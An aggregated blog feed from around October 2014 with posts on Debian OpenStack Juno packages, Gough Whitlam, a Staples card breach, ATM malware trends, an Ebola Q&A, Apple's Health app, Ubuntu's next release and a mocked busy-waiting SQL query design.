Planet DebianThomas Goirand: OpenStack Juno is out, Debian (and Ubuntu Trusty ports) packages ready

This is just a quick announcement: Debian packages for Juno are out. In fact, they were ready the day of the release, on the 16th of October. I uploaded it all (to Experimental) the same day, literally a few hours after the final release was git tagged. But I had no time to announce it.

This weekend, I took the time to do an Ubuntu Trusty port, which I also publish (it’s just a matter of rebuilding all, and it should work out of the box). Here are the backports repositories. For Wheezy:

deb http://archive.gplhost.com/debian juno-backports main

deb http://archive.gplhost.com/debian juno main

For trusty:

deb http://archive.gplhost.com/debian trusty-juno-backports main

But of course, everything is also available directly in Debian. Sid/Jessie contains OpenStack Icehouse (which has more chance of receiving long enough security support), and it will stay like this until Jessie is released, so I have uploaded all of Juno into Debian Experimental. This shows on the OpenStack qa page (you may also notice that the team is nearly reaching 200 packages… though I am planning to off-load some of that to the Python module team, when the migration to Git is finished). On the QA page, you may also see that I uploaded all of the last Icehouse point release to Sid, and that all packages migrated to Jessie. There are only a few minor issues with some Python modules which I fixed, that haven’t migrated to Jessie yet.

I can already tell that all packages can be installed without an issue, and that I know Horizon at least works as expected. But I didn’t have time to test it all just yet. I’m currently working on doing even more installation automation at the package level (by providing some OVS bridging init script and such, to make it more easy to run Tempest functional testing). I’ll post more about this when it’s ready.

Kelvin ThomsonDeath of Gough Whitlam

Gough Whitlam was a towering figure in Australian public life. I think he was the greatest man to ever grace the Australian Labor Party, and the most influential Australian Prime Minister of the past fifty years. He did this after enlisting during the Second World War with the RAAF. This was of course a very dangerous thing to do - my father's older brother John, after whom I have my middle name, did this too, but did not return.

I was a year twelve student in 1972, and had a bright orange It's Time sticker on my school bag. I remember that after he won the election one of my schoolmates said to me that while he was keen for Gough to win, Gough would not be able to put an end to Australia's involvement in Vietnam, and to conscription, any time soon. I was crestfallen by this, and delighted when only a day or two later Gough's two-man Cabinet did precisely that.

His leadership and vision for Australia was one of the key things that inspired me to join the Australian Labor Party, which I did in 1974. It was against the run of play, as Gough's government was thrown out comprehensively at the end of the next year.

But his legacy has proved to be so longstanding that I think he can rightly claim to be the most influential Prime Minister of the past 50 years. It was such a monumental body of work that I cannot do justice to it, but there are a number of features of it which I want to single out. The introduction of free tertiary education. It made such a difference to the lives of so many. The more I look at it, the more I think it was a mistake to move away from that.

Medibank, which was of course the predecessor of Medicare. It gave Australia quite possibly the best health care system in the world, where everyone, rich and poor alike, has access to high quality health care.

The protection of the environment. Gough took the National government into the area of environment protection, preventing drilling of the Great Barrier Reef, ratifying the World Heritage Convention, the RAMSAR Convention, and passing the National Parks and Wildlife Conservation Act.

Indigenous Affairs. Gough passed legislation to abolish discrimination against aboriginal people, and granted land rights to indigenous people, and returned lands in the Northern Territory to the Gurindji people.

People will always draw on the aspects of someone's legacy that are consistent with their own views, and I am no different. In that vein I point out that in 1974 he wrote that traditional forms of democratic government are under challenge, and listed population growth as first among these. Later in that article he said “I do not envisage any dramatic increase in our present population, and indeed I would not wish to see one". I think he was absolutely right in that assessment. And indeed he cut migration numbers during his time as Prime Minister, which is perhaps not widely known.

I had a number of conversations with him, and there are two that stick in my mind. The first is when I rang him as a young Member of Parliament with an interest in fixed-term Parliaments and knowledge that Gough had championed this cause, including a proposal for simultaneous Federal and State elections. I was pleased that my call was put through, and astonished that Gough was able to rattle off, without any forewarning of my call and in the days before the Internet and Google, the electoral arrangements for many of the states of the USA.

Later on I won an afternoon tea with Gough in a Labor Party raffle. This time he did know I was coming, but it was 2002 and he was by then 86. I was again astonished to see that at the ripe old age of 86 he had gone to the trouble of looking me up on the Internet and coming to the afternoon tea extremely well informed about my background and interests.

No doubt Gough made mistakes. But the fact is that anyone in public life makes decisions every day, and it is unreasonable to expect every one of those decisions to be correct. And a Prime Minister makes hundreds, even thousands of decisions. Yes he was defeated decisively after three years, but that should be understood in the context of coming to power after a 23 year absence for Labor, and bumping into a world which had been shaped by and was dominated by his political opponents. After the change of government Malcolm Fraser acknowledged the need to make the Senate more representative and sponsored a referendum to require State Parliaments to fill Senate casual vacancies with the nominee of the Party the Senator had belonged to. And it should also be understood that Gough was newly in power when the OPEC oil shock of 1974 hit - this generated inflation and unemployment, and most Western governments unfortunate enough to be in power at the time did not last for long.

Gough's struggle with Malcolm Fraser was titanic. I remember United States commentators at the time remarking on the ability of the two men, and wondering why American politics was not throwing up leaders of comparable calibre.

The best thing we can do to honour Gough's monumental legacy is to protect it. Whether it is tertiary education, or health, or environment protection, or indigenous affairs, we should honour and protect his legacy. Most of all I hope we remember his commitment to politics as an honourable profession. It is unthinkable to imagine Gough taking on a job as a corporate lobbyist or company director in a post political career. The idea of using a parliamentary career as a stepping stone to a cushy corporate job would have been anathema to him.

I hope his life and example continues to inspire Australians to undertake public service, and to believe in the capacity of the political process to produce good outcomes, to make people’s lives better, for many years to come.

Krebs on SecurityBanks: Credit Card Breach at Staples Stores

Multiple banks say they have identified a pattern of credit and debit card fraud suggesting that several Staples Inc. office supply locations in the Northeastern United States are currently dealing with a data breach. Staples says it is investigating “a potential issue” and has contacted law enforcement.

According to more than a half-dozen sources at banks operating on the East Coast, it appears likely that fraudsters have succeeded in stealing customer card data from some subset of Staples locations, including seven Staples stores in Pennsylvania, at least three in New York City, and another in New Jersey.

Framingham, Mass.-based Staples has more than 1,800 stores nationwide, but so far the banks contacted by this reporter have traced a pattern of fraudulent transactions on a group of cards that had all previously been used at a small number of Staples locations in the Northeast.

The fraudulent charges occurred at other (non-Staples) businesses, such as supermarkets and other big-box retailers. This suggests that the cash registers in at least some Staples locations may have fallen victim to card-stealing malware that lets thieves create counterfeit copies of cards that customers swipe at compromised payment terminals.

Asked about the banks’ claims, Staples’s Senior Public Relations Manager Mark Cautela confirmed that Staples is in the process of investigating a “potential issue involving credit card data and has contacted law enforcement.”

“We take the protection of customer information very seriously, and are working to resolve the situation,” Cautela said. “If Staples discovers an issue, it is important to note that customers are not responsible for any fraudulent activity on their credit cards that is reported on [in] a timely basis.”  

Planet Linux AustraliaDavid Rowe: SM1000 Part 7 – Over the air in Germany

Michael Wild DL2F2 in Germany recently attended a Hamfest where he demonstrated his SM1000. Michael sent me the following email (hint: I used Google translate on the web sites):

Here is the link to the review of our local hamfest.

At the bottom is a video of a short QSO on 40m using the SM-1000 over about 400km. The other station was Hermann (DF2DR). Hermann documented this QSO very well on his homepage also showing a snapshot of the waterfall during this QSO. Big selective fading as you can see, but we were doing well!

He also explains that, when switching to SSB at the same average power level, the voice was almost not understandable!

SM1000 Beta and FreeDV Update

Rick KA8BMA has been working hard on the Beta CAD work, and fighting a few Eagle DRC battles. Thanks to all his hard work we now have an up to date schematic and BOM for the Betas. He is now working on the Beta PCB layout, and we are refining the BOM with Edwin from Dragino in China. Ike, W3IKIE, has kindly been working with Rick to come up with a suitable enclosure. Thanks guys!

My current estimate is that the Beta SM1000s will be assembled in November. Once I’ve tested a few I’ll put them up on my store and start taking orders.

In the meantime I’ve thrown myself into modem simulations – playing with a 450 bit/s version of Codec 2, LDPC FEC codes, diversity schemes and coherent QPSK demodulation. I’m pushing towards a new FreeDV mode that works on fading channels at negative SNRs. More on that in later posts. The SM1000 and a new FreeDV mode are part of my goals for 2014. The SM1000 will make FreeDV easy to use, the new mode(s) will make it competitive with SSB on HF radio.

Everything is open source, both hardware and software. No vendor lock in, no software licenses and you are free to experiment and innovate.

Planet Linux AustraliaChris Samuel: IBM Pays GlobalFoundries to take Microprocessor Business

Interesting times for IBM, having already divested themselves of the x86 business by selling it on to Lenovo they’ve now announced that they’re paying GlobalFoundries $1.5bn to take pretty much that entire side of the business!

IBM (NYSE: IBM) and GLOBALFOUNDRIES today announced that they have signed a Definitive Agreement under which GLOBALFOUNDRIES plans to acquire IBM’s global commercial semiconductor technology business, including intellectual property, world-class technologists and technologies related to IBM Microelectronics, subject to completion of applicable regulatory reviews. GLOBALFOUNDRIES will also become IBM’s exclusive server processor semiconductor technology provider for 22 nanometer (nm), 14nm and 10nm semiconductors for the next 10 years.

It includes IBM’s IP and patents, though IBM will continue to do research for 5 years and GlobalFoundries will get access to that. Now what happens to those researchers (one of whom happens to be a friend of mine) after that isn’t clear.

When I heard the rumours yesterday I was wondering if IBM was aiming to do an ARM and become a fab-less CPU designer but this is much more like exiting the whole processor business altogether. The fact that they seem to be paying GlobalFoundries to take this off their hands also makes it sound pretty bad.

What this all means for their Power CPU is uncertain, and if I was nVidia and Mellanox in the OpenPOWER alliance I would be hoping I’d know about this before joining up!

This item originally posted here:

IBM Pays GlobalFoundries to take Microprocessor Business

TEDHow do we stop the spread of Ebola? A Q&A at TEDGlobal 2014


Chikwe Ihekweazu speaks at TEDGlobal 2014. Photo: Ryan Lash/TED

Ten years ago, epidemiologist Chikwe Ihekweazu helped fight an outbreak in South Sudan. This TED Fellow now runs the health consultancy EpiAFRIC, writes about public health issues in his native Nigeria, and is soon to start a four-week rotation on the ground fighting the Ebola epidemic. So as the outbreak continues, he sat down for a Q&A with Chris Anderson in Session 11 to give insights into what is happening and how concerned we all should be.

The first question: Can we get the scientific overview of what Ebola is and how it makes people sick?

Ihekweazu gives the disconcerting answer that, unlike some other viruses, we don’t know what the natural host is for Ebola. We do, however, know that in humans it is passed through contact with bodily fluids. We know that the disease has an incubation period of 2 to 21 days and that, unlike many other viruses, you can’t actually transmit the virus unless you are ill. “Most outbreaks are relatively small,” says Ihekweazu. In the South Sudan outbreak he helped fight a decade ago, there were fewer than 30 cases.

This time around, things are much worse. As of this moment, there have been close to 8,000 cases and 4,000 deaths. “This is really the worst outbreak we’ve ever dealt with — there’s really been nothing close,” says Ihekweazu. Public health advocates have one main tactic from here: to stop the chain of transmission from one sick person to another. Those most at risk for infection are family members of those already infected, health care workers and people involved in funeral rites.

The difficulty of fighting the Ebola epidemic in Africa connects to larger currents on the global stage. To illustrate this, Ihekweazu shows us two highly distorted maps of the world. The first illustrates the global deaths from infectious diseases— in this map, Africa and India are severely bloated, while the Americas appear as just a sliver. The next map shows public health spending in the world—here, the United States and Europe appear gigantic, while Africa becomes a thin line. Ihekweazu drops the shocking fact that there is one doctor to every 100,000 people in Liberia. “For Ebola to cause an outbreak, it probably picked the best two or three countries to happen in,” he says.

Ihekweazu says that he learned some important lessons in South Sudan that will be helpful this time around. For example, that the stark remoteness of isolation wards is a problem. “If you come to a place like this, it’s likely that you’re going to die there,” says Ihekweazu. “The cycle of anxiety keeps people away and keeps the outbreak spreading, because people stay home and infect their loved ones.” A big challenge now is convincing people to trust local hospitals in which they have “little confidence.”

But there is a success story: the containment of Ebola in Lagos, Nigeria. When the first case of Ebola cropped up there, it spread to 13 people quickly. But then the spread stopped. An Ebola response center was quickly spun up.

Thousands of people who’d had contact with patients were contacted and monitored carefully. It worked — there have only been 8 cases since.

Anderson’s next question for Ihekweazu: At this late stage, can the world get this under control?

“It can go either way. We could see a plateau in the next few months — which we hope for — or we could see a radical escalation,” says Ihekweazu. “It really depends on what we do in the next few weeks.”

He feels encouraged as he sees the international community rallying to support the countries most affected by Ebola. “This is a challenge for our common global community — not just a problem for Liberia and Sierra Leone,” he says. “Whether it’s influenza in Mexico, or SARS in Hong Kong, or Ebola in Liberia, the boundaries we hold so dear are not respected by infectious diseases.”

In Africa especially, governments need to step up. Ihekweazu points out that many hospitals and schools operate without running water, something he says is unacceptable. “How do we mobilize resources to deal with health, education, justice systems, to keep pace with development we’re seeing driven by the private sector across Africa?” he says. “We have a large economy, but it’s all private sector. Our public sector needs to step up.”

The final question: What can people do to help?

Ihekweazu stresses two things. First, that people support governments that are giving resources to fight this epidemic. And second, that they give money directly to Médecins Sans Frontières, or Doctors without Borders. “They know what to do — they’ve done it for years,” he says.


Racialicious#GIA14: Racial Conversation as Performance Art

Originally published at Grantmakers in the Arts

The rules of the Long Table.


Can a conversation about race be a performance? What does that simple framework shift do to the conversation? The answer: everything.

The long table conversation is a fascinating thing to watch unfold. Participants come in and out as they please. There is snacking and scribbling, mostly on topic. Some people were determined watchers, setting up camp on the chairs on the far edge of the perimeter. And others eagerly queued up in the seats closest to the table, waiting for the moment they could tap someone on the shoulder, sending that performer out and putting themselves into the conversation.


The Long Table – The Beginning

The conversation starts off immediately. There aren’t really any awkward pauses. The presence of the table as a speaking space created a flow that participants respected. I wondered if an art project gave people license to break the rules and conventions of conversation. I felt inspired to draw a circle around an errant blueberry on the table. And at times, I felt the urge to run around, to lean over someone and circle their scribble, to interact out of order and out of place. After all, isn’t that art? Responding to stimuli?

But that will have to wait for another long table. People needed this space – stories flowed alongside tears and while this may have been intended as an art project the space morphed to accommodate mass catharsis.

Defining racial equity.


Race Scrawl.


(TRA is an abbreviation for transracial adoptee.)

Racial Scrawl 2


The session draws to a close. Many are in tears. Some feel a profound shift. Others looked at the way inequality replicated itself at the table. There is no solution. But in art, does there need to be a neat resolution?

The post #GIA14: Racial Conversation as Performance Art appeared first on Racialicious - the intersection of race and pop culture.

Geek FeminismQuick hit: Simply Secure, a new nonprofit promoting usable security, is hiring a research director and an operations manager

Simply Secure is a new non-profit that focuses on helping the open source community do a better job at security. Their focus is on adding usable security technology on top of existing, already-widely-adopted platforms and services, and their advisory board includes Wendy Seltzer, Cory Doctorow, and Angela Sasse, among others. (Full disclosure: I went to college with the executive director and founder, Sara “Scout” Sinclair Brody.)

They are hiring for two full-time positions right now: a research director/associate director with some mix of practical experience and formal education in security and UX design (sufficient experience compensates for a lesser degree of formal education), and an operations manager who will write grants and manage finances. Simply Secure strongly encourages applications from populations under-represented in the technology industry. For both positions, experience with and/or enthusiasm for open source is desirable but not required. Simply Secure is located in the US in Philadelphia and is actively recruiting candidates who work remotely.

To apply, visit their jobs page!

Sociological ImagesApple’s Health App: Where’s the Power?

In truth, I didn’t pay a tremendous amount of attention to iOS8 until a post scrolled by on my Tumblr feed, which disturbed me a good deal: The new iteration of Apple’s OS included “Health”, an app that – among many other things – contains a weight tracker and a calorie counter.

And can’t be deleted.


Okay, so why is this a big deal? Pretty much all “health” apps include those features. I have one (third-party). A lot of people have one. They can be very useful. Apple sticking non-removable apps into its OS is annoying, but why would it be something worth getting up in arms over? This is where it becomes a bit difficult to explain, and where you’re likely to encounter two kinds of people (somewhat oversimplified, but go with me here). One group will react with mild bafflement. The other will immediately understand what’s at stake.

The Health app is literally dangerous, specifically to people dealing with/in recovery from eating disorders and related obsessive-compulsive behaviors. Obsessive weight tracking and calorie counting are classic symptoms. These disorders literally kill people. A lot of people. Apple’s Health app is an enabler of this behavior, a temptation to fall back into self-destructive habits. The fact that it can’t be deleted makes it worse by orders of magnitude.

So why can’t people just not use it? Why not just hide it? That’s not how obsessive-compulsive behavior works. One of the nastiest things about OCD symptoms – and one of the most difficult to understand for people who haven’t experienced them – is the fact that a brain with this kind of chemical imbalance can and will make you do things you don’t want to do. That’s what “compulsive” means. Things you know you shouldn’t do, that will hurt you. When it’s at its worst it’s almost impossible to fight, and it’s painful and frightening. I don’t deal with disordered eating, but my messed-up neurochemistry has forced me to do things I desperately didn’t want to do, things that damaged me. The very presence of this app on a device is a very real threat (from post linked above):

Whilst of course the app cannot force you to use it, it cannot be deleted, so will be present within your apps and can be a source of feelings of temptation to record numbers and of guilt and judgement for not using the app.

Apple doesn’t hate people with eating disorders. They probably weren’t thinking about people with eating disorders at all. That’s the problem.

Then this weekend another post caught my attention: The Health app doesn’t include the ability to track menstrual cycles, something that’s actually kind of important for the health of people who menstruate. Again: so? Apple thinks a number of other forms of incredibly specific tracking were important enough to include:

In case you’re wondering whether Health is only concerned with a few basics: Apple has predicted the need to input data about blood oxygen saturation, your daily molybdenum or pathogenic acid intake, cycling distance, number of times fallen and your electrodermal activity, but nothing to do with recording information about your menstrual cycle.

Again: Apple almost certainly doesn’t actively hate cisgender women, or anyone else who menstruates. They didn’t consider including a cycle tracker and then went “PFFT SCREW WOMEN.” They probably weren’t thinking about women at all.

During the design phase of this OS, half the world’s population was probably invisible. The specific needs of this half of the population were folded into an unspecified default. Which doesn’t – generally – menstruate.

I should note that – of course – third-party menstrual cycle tracking apps exist. But people have problems with these (problems I share), and it would have been nice if Apple had provided an escape from them:

There are already many apps designed for tracking periods, although many of my survey respondents mentioned that they’re too gendered (there were many complaints about colour schemes, needless ornamentation and twee language), difficult to use, too focused on conceiving, or not taking into account things that the respondents wanted to track.

Both of these problems are part of a larger design issue, and it’s one we’ve talked about before, more than once. The design of things – pretty much all things – reflects assumptions about what kind of people are going to be using the things, and how those people are going to use them. That means that design isn’t neutral. Design is a picture of inequality, of systems of power and domination both subtle and not. Apple didn’t consider what people with eating disorders might be dealing with; that’s ableism. Apple didn’t consider what menstruating women might need to do with a health app; that’s sexism.

The fact that the app cannot be removed is a further problem. For all intents and purposes, updating to a new OS is almost mandatory for users of Apple devices, at least eventually. Apple already has a kind of control over a device that’s a bit worrying, blurring the line between owner and user and threatening to replace one with the other. The Health app is a glimpse of a kind of well-meaning but ultimately harmful paternalist approach to design: We know what you need, what you want; we know what’s best. We don’t need to give you control over this. We know what we’re doing.

This isn’t just about failure of the imagination. This is about social power. And it’s troubling.

Sarah Wanenchak is a PhD student at the University of Maryland, College Park. Her current research focuses on contentious politics and communications technology in a global context, particularly the role of emotion mediated by technology as a mobilizing force. She blogs at Cyborgology, where this post originally appeared, and you can follow her at @dynamicsymmetry.

(View original at http://thesocietypages.org/socimages)

Mark ShuttleworthV is for Vivid

Release week! Already! I wouldn’t call Trusty ‘vintage’ just yet, but Utopic is poised to leap into the torrent stream. We’ve all managed to land our final touches to *buntu and are excited to bring the next wave of newness to users around the world. Glad to see the unicorn theme went down well, judging from the various desktops I see on G+.

And so it’s time to open the vatic floodgates and invite your thoughts and contributions to our soon-to-be-opened iteration next. Our ventrous quest to put GNU as you love it on phones is bearing fruit, with final touches to the first image in a new era of convergence in computing. From tiny devices to personal computers of all shapes and sizes to the ventose vistas of cloud computing, our goal is to make a platform that is useful, versal and widely used.

Who would have thought – a phone! Each year in Ubuntu brings something new. It is a privilege to celebrate our tenth anniversary milestone with such vernal efforts. New ecosystems are born all the time, and it’s vital that we refresh and renew our thinking and our product in vibrant ways. That we have the chance to do so is testament to the role Linux at large is playing in modern computing, and the breadth of vision in our virtual team.

To our fledgling phone developer community, for all your votive contributions and vocal participation, thank you! Let’s not be vaunty: we have a lot to do yet, but my oh my what we’ve made together feels fantastic. You are the vigorous vanguard, the verecund visionaries and our venerable mates in this adventure. Thank you again.

This verbose tract is a venial vanity, a chance to vector verbal vibes, a map of verdant hills to be climbed in months ahead. Amongst those peaks I expect we’ll find new ways to bring secure, free and fabulous opportunities for both developers and users. This is a time when every electronic thing can be an Internet thing, and that’s a chance for us to bring our platform, with its security and its long term support, to a vast and important field. In a world where almost any device can be smart, and also subverted, our shared efforts to make trusted and trustworthy systems might find fertile ground. So our goal this next cycle is to show the way past a simple Internet of things, to a world of Internet things-you-can-trust.

In my favourite places, the smartest thing around is a particular kind of monkey. Vexatious at times, volant and vogie at others, a vervet gets in anywhere and delights in teasing cats and dogs alike. As the upstart monkey in this business I can think of no better mascot. And so let’s launch our vicenary cycle, our verist varlet, the Vivid Vervet!

RacialiciousLive From San Diego Comic Fest: The Afrofuturism Panel

By Arturo R. García

The final day of the Comic Fest opened with one of the most far-ranging topics in speculative fiction in Afrofuturism. And true to form, the speakers reached into the past and toward the future in discussing not only their interpretation of the concept, but how it has influenced their fandom and their work.

[View the story "San Diego Comic Fest: Afrofuturism" on Storify]

Top image: A still from the trailer for “The Crypto-Historians,” which can be seen below.

Video: http://www.youtube.com/embed/NTmoPJDi10s

The post Live From San Diego Comic Fest: The Afrofuturism Panel appeared first on Racialicious - the intersection of race and pop culture.

Planet DebianMichal Čihař: Hosted Weblate has new UI

The biggest part of this HackWeek will be spent on Weblate. The major task is to complete the new UI for it. There have already been some blog posts about that here, so regular readers of my blog already know it is using Twitter Bootstrap.

Today it has reached the point where I think it's good enough for wider testing and I've deployed it at Hosted Weblate (see Weblate website for conditions for getting hosting there).

I expect there will be some rough edges, so don't hesitate to report any issues, so that I can quickly fix them.


RacialiciousLive From San Diego Comic Fest: Latino Comics

By Arturo R. García

Over the weekend I went to the third annual San Diego Comic Fest, which has pointedly positioned itself as the anti-Comic Con.

Specifically, the size of the event is kept manageable for vendors, presenters and attendees alike; no conference room holds more than 40 or 50 people at one time, allowing for a more relaxed atmosphere and easier conversations between panelists and their audiences.

One end result is, panels focusing on diversity don’t feel as lost in the shuffle. And the Latino Comics panel covered not only industry trends within Latin America, but the rapidly-evolving effects of Latinidad on the U.S.’ identity.

[View the story "San Diego Comic Fest: Latino Comics" on Storify]

[Top image via "The Condor and The Eagle: A Pilgrimage to Machu Picchu" official Facebook page]

The post Live From San Diego Comic Fest: Latino Comics appeared first on Racialicious - the intersection of race and pop culture.

Planet Linux AustraliaAndrew Pollock: [life] Day 264: Pupil Free Day means lots of park play

Today was a Kindergarten (and it seemed most of the schools in Brisbane) Pupil Free Day.

Grace, the head honcho of Thermomix in Australia, was supposed to be in town for a meet and greet, and a picnic in New Farm Park had been organised, but at the last minute she wasn't able to make it due to needing to be in Perth for a meeting. The plan changed and we had a Branch-level picnic meeting at the Colmslie Beach Reserve.

So after Sarah dropped Zoe off, I whipped up some red velvet cheesecake brownie, which seems to be my go to baked good when required to bring a plate (it's certainly popular) and I had some leftover sundried tomatoes, so I whipped up some sundried tomato dip as well.

The meet up in the park was great. My group leader's daughters were there, as were plenty of other consultants' kids due to the Pupil Free Day, and Zoe was happy to hang out and have a play. There was lots of yummy food, and we were able to graze and socialise a bit. We called it lunch.

After we got home, we had a bit of a clean up of the balcony, which had quite a lot of detritus from various play dates and craft activities. Once that was done, we had some nice down time in the hammock.

We then biked over to a park to catch up with Zoe's friend Mackensie for a play date. The girls had a really nice time, and I discovered that the missing link in the riverside bike path has been completed, which is rather nice for both cycling and running. (It goes to show how long it's been since I've gone for a run, I really need to fix that).

After that, we biked home, and I made dinner. We got through dinner pretty quickly, and so Zoe and I made a batch of ginger beer after dinner, since there was a Thermomix recipe for it. It was cloudy though, and Zoe was more used to the Bundaberg ginger beer, which is probably a bit better filtered, so she wasn't so keen on it.

All in all, it was a really lovely way to spend a Pupil Free Day.

Worse Than FailureCodeSOD: Parallel SQL Queries

Daniele worked at a pharmaceutical firm that had an old web application that allowed commercial customers to look up information. Since the data was quite complicated, there were numerous fields that needed to be queried in order to populate the form.

Unfortunately, as the amount of data in the system grew, the time to load the form grew as well. And grew. And grew.

Fortunately, the DBA in charge of setting up the underlying tables was actually quite capable at setting up tables with the proper relationships. For example, an address consists of street, city, zip, province and country. A country can contain multiple provinces which can contain multiple cities which can contain multiple zip codes, and so forth. As it was well organized, the database was not the problem; the source of the slowness was likely in the code.

And what code it was. The programmer that engineered this had to have revered this piece of brilliance as well. They decided that they would support substantial data growth by querying the data in parallel. Yes, there would be a separate query for each field - run in a separate thread - in parallel. In other words, all of the queries had essentially the same where-clause (except for the joins); only the fields that were selected were different. For cases where one field depended upon another, the dependency was handled like this in the corresponding query classes, which all followed the same pattern:

    class StreetQuery extends Thread {
      // Street names can be duplicated. We need to know in which
      // city this street resides in order to query for it.
      private CityQuery city;

      // Not volatile: a thread spinning on isRunning() is not
      // guaranteed to ever see this change.
      private boolean finished = false;

      public StreetQuery(CityQuery city) {
        this.city = city;
      }

      public boolean isRunning() {
        return !finished;
      }

      @Override
      public void run() {
        // Busy-wait (burning a CPU core) until the query on which we depend finishes
        while (city.isRunning());

        // do query here, using any results from dependent queries as needed
        finished = true;
      }
    }

Daniele replaced all of that with a single stored procedure and the delays were gone.

One can't help but wonder if the author of the original code might have been helping themselves to a few too many sample products...
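The fix described above, as an added example that is not Daniele's code or the original application's: one query per form field, each repeating the same where-clause and re-walking the joins, next to a single joined query that returns every field at once. The schema, table names and rows are constructed for illustration, and a joined SQLite query stands in for the stored procedure.

```python
import sqlite3

# Constructed schema and rows. The page names the hierarchy (country >
# province > city > zip > street) but not the real tables, so every
# identifier below is an assumption made for this example.
SCHEMA = """
CREATE TABLE country  (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE province (id INTEGER PRIMARY KEY, name TEXT, country_id INTEGER REFERENCES country(id));
CREATE TABLE city     (id INTEGER PRIMARY KEY, name TEXT, province_id INTEGER REFERENCES province(id));
CREATE TABLE zip      (id INTEGER PRIMARY KEY, code TEXT, city_id INTEGER REFERENCES city(id));
CREATE TABLE street   (id INTEGER PRIMARY KEY, name TEXT, zip_id INTEGER REFERENCES zip(id));
CREATE TABLE customer (id INTEGER PRIMARY KEY, name TEXT, street_id INTEGER REFERENCES street(id));
INSERT INTO country  VALUES (1, 'Italy');
INSERT INTO province VALUES (1, 'Milano', 1), (2, 'Roma', 1);
INSERT INTO city     VALUES (1, 'Milan', 1), (2, 'Rome', 2);
INSERT INTO zip      VALUES (1, '20121', 1), (2, '00184', 2);
-- The same street name exists in two cities, which is why the original
-- StreetQuery had to wait for CityQuery.
INSERT INTO street   VALUES (1, 'Via Garibaldi', 1), (2, 'Via Garibaldi', 2);
INSERT INTO customer VALUES (1, 'Example Pharmacy A', 1), (2, 'Example Pharmacy B', 2);
"""

# (form field, selected column, join needed to reach that column)
STEPS = [
    ("street",   "s.name",  "JOIN street s   ON s.id  = c.street_id"),
    ("zip",      "z.code",  "JOIN zip z      ON z.id  = s.zip_id"),
    ("city",     "ci.name", "JOIN city ci    ON ci.id = z.city_id"),
    ("province", "p.name",  "JOIN province p ON p.id  = ci.province_id"),
    ("country",  "co.name", "JOIN country co ON co.id = p.country_id"),
]


def open_db():
    """Create the constructed sample database in memory."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def per_field_lookup(db, customer_id):
    """One query per form field, as in the original design (minus the threads).

    Every query repeats the same WHERE clause and re-walks the joins the
    previous field already walked. Returns (fields, number_of_queries).
    """
    fields, queries = {}, 0
    for i, (field, column, _) in enumerate(STEPS):
        joins = " ".join(join for _, _, join in STEPS[: i + 1])
        # SQL text is built from the constants above only; the caller's
        # value is always passed as a bound parameter.
        sql = f"SELECT {column} FROM customer c {joins} WHERE c.id = ?"
        fields[field] = db.execute(sql, (customer_id,)).fetchone()[0]
        queries += 1
    return fields, queries


def single_lookup(db, customer_id):
    """All fields in one joined query: one round trip and no ordering
    between queries to coordinate. Returns (fields, number_of_queries)."""
    columns = ", ".join(column for _, column, _ in STEPS)
    joins = " ".join(join for _, _, join in STEPS)
    sql = f"SELECT {columns} FROM customer c {joins} WHERE c.id = ?"
    row = db.execute(sql, (customer_id,)).fetchone()
    return dict(zip((field for field, _, _ in STEPS), row)), 1


if __name__ == "__main__":
    db = open_db()
    print("per field:", per_field_lookup(db, 2))
    print("single   :", single_lookup(db, 2))
```

With the join, the database resolves the street-to-city dependency itself, so there is nothing left for application threads to wait on.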

Planet DebianMichal Čihař: Enca 1.16

As a first tiny project in this HackWeek, Enca 1.16 has just been released. It mostly brings small code cleanups and missing aliases for languages, but also fixes some minor bugs found by Coverity Scan.

If you don't know Enca, it is an Extremely Naive Charset Analyser. It detects character set and encoding of text files and can also convert them to other encodings using either a built-in converter or external libraries and tools like libiconv, librecode, or cstocs.

Full list of changes for 1.16 release:

  • Fixed typo in Belarusian language name
  • Added aliases for Chinese and Yugoslavian languages

Enca is still in maintenance mode only and I have no intention of writing new features. However, there is no such limitation for other contributors :-).

You can download from http://cihar.com/software/enca/.


Krebs on SecuritySpike in Malware Attacks on Aging ATMs

This author has long been fascinated with ATM skimmers, custom-made fraud devices designed to steal card data and PINs from unsuspecting users of compromised cash machines. But a recent spike in malicious software capable of infecting and jackpotting ATMs is shifting the focus away from innovative, high-tech skimming devices toward the rapidly aging ATM infrastructure in the United States and abroad.

Last month, media outlets in Malaysia reported that organized crime gangs had stolen the equivalent of about USD $1 million with the help of malware they’d installed on at least 18 ATMs across the country. Several stories about the Malaysian attack mention that the ATMs involved were all made by ATM giant NCR. To learn more about how these attacks are impacting banks and the ATM makers, I reached out to Owen Wild, NCR’s global marketing director, security compliance solutions.

Wild said ATM malware is here to stay and is on the rise.


BK: I have to say that if I’m a thief, injecting malware to jackpot an ATM is pretty money. What do you make of reports that these ATM malware thieves in Malaysia were all knocking over NCR machines?

OW: The trend toward these new forms of software-based attacks is occurring industry-wide. It’s occurring on ATMs from every manufacturer, multiple model lines, and is not something that is endemic to NCR systems. In this particular situation for the [Malaysian] customer that was impacted, it happened to be an attack on a Persona series of NCR ATMs. These are older models. We introduced a new product line for new orders seven years ago, so the newest Persona is seven years old.

BK: How many of your customers are still using this older model?

OW: Probably about half the install base is still on Personas.

BK: Wow. So, what are some of the common trends or weaknesses that fraudsters are exploiting that let them plant malware on these machines? I read somewhere that the crooks were able to insert CDs and USB sticks in the ATMs to upload the malware, and they were able to do this by peeling off the top of the ATMs or by drilling into the facade in front of the ATM. CD-ROM and USB drive bays seem like extraordinarily insecure features to have available on any customer-accessible portions of an ATM.

OW: What we’re finding is these types of attacks are occurring on standalone, unattended types of units where there is much easier access to the top of the box than you would normally find in the wall-mounted or attended models.

BK: Unattended….meaning they’re not inside of a bank or part of a structure, but stand-alone systems off by themselves.

OW: Correct.

BK: It seems like the other big factor with ATM-based malware is that so many of these cash machines are still running Windows XP, no?


This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.

OW: Right now, that’s not a major factor. It is certainly something that has to be considered by ATM operators in making their migration move to newer systems. Microsoft discontinued updates and security patching on Windows XP, with very expensive exceptions. Where it becomes an issue for ATM operators is that maintaining Payment Card Industry (credit and debit card security standards) compliance requires that the ATM operator be running an operating system that receives ongoing security updates. So, while many ATM operators certainly have compliance issues, to this point we have not seen the operating system come into play.

BK: Really?

OW: Yes. If anything, the operating systems are being bypassed or manipulated with the software as a result of that.

